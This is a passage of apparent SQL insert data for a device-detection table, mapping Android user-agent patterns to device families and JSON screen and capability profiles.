Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; thl T6S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; verykool s5518) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; verykoolS5005) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; vivo X710L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; vivo Y15) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; vivo Y28) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_vivo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile DuckDuckGo/5 Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":533,\"screenHeight\":853,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*); 6044D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; 0PM92) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; 1201) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; 2014811) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; 2014812) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; 2014817) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; 2014818) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; 2014819) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; 4017A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; 4017D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; 4017F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; 4017X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; 401SO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; 402SO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; 403SH) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; 4045D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; 404SH) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; 501 SZ) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; 5015A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; 5015D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; 5015X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; 5016J) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; 5017A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; 5017B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; 5017D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; 5017O) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; 5017X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; 5019D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; 501SO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; 5022D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; 5022E) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; 5022X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; 5025D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; 5025E) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; 5025G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; 502SH) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; 5054A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; 5054D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; 5054N) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; 5054S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; 5054X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; 5065A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; 5070D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; 5116J) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; 6039A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; 6039H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; 6039Y) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; 6044D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; 6045B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; 6045I) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; 6045Y) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; 7043A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; 7043K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":641,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; 7044X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; 7048A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; 7048X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; 7053D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; 8050D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; 8050E) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; 8050G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; 8070) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; 9007A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":400,\"screenHeight\":683,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; 9007X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":400,\"screenHeight\":683,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; 9010X) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; 9022X) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; A0001) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; A110) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; A1601) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; A1603) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; A20) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; A33f) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; A33fw) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; A33w) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; A37f) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; A37fw) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 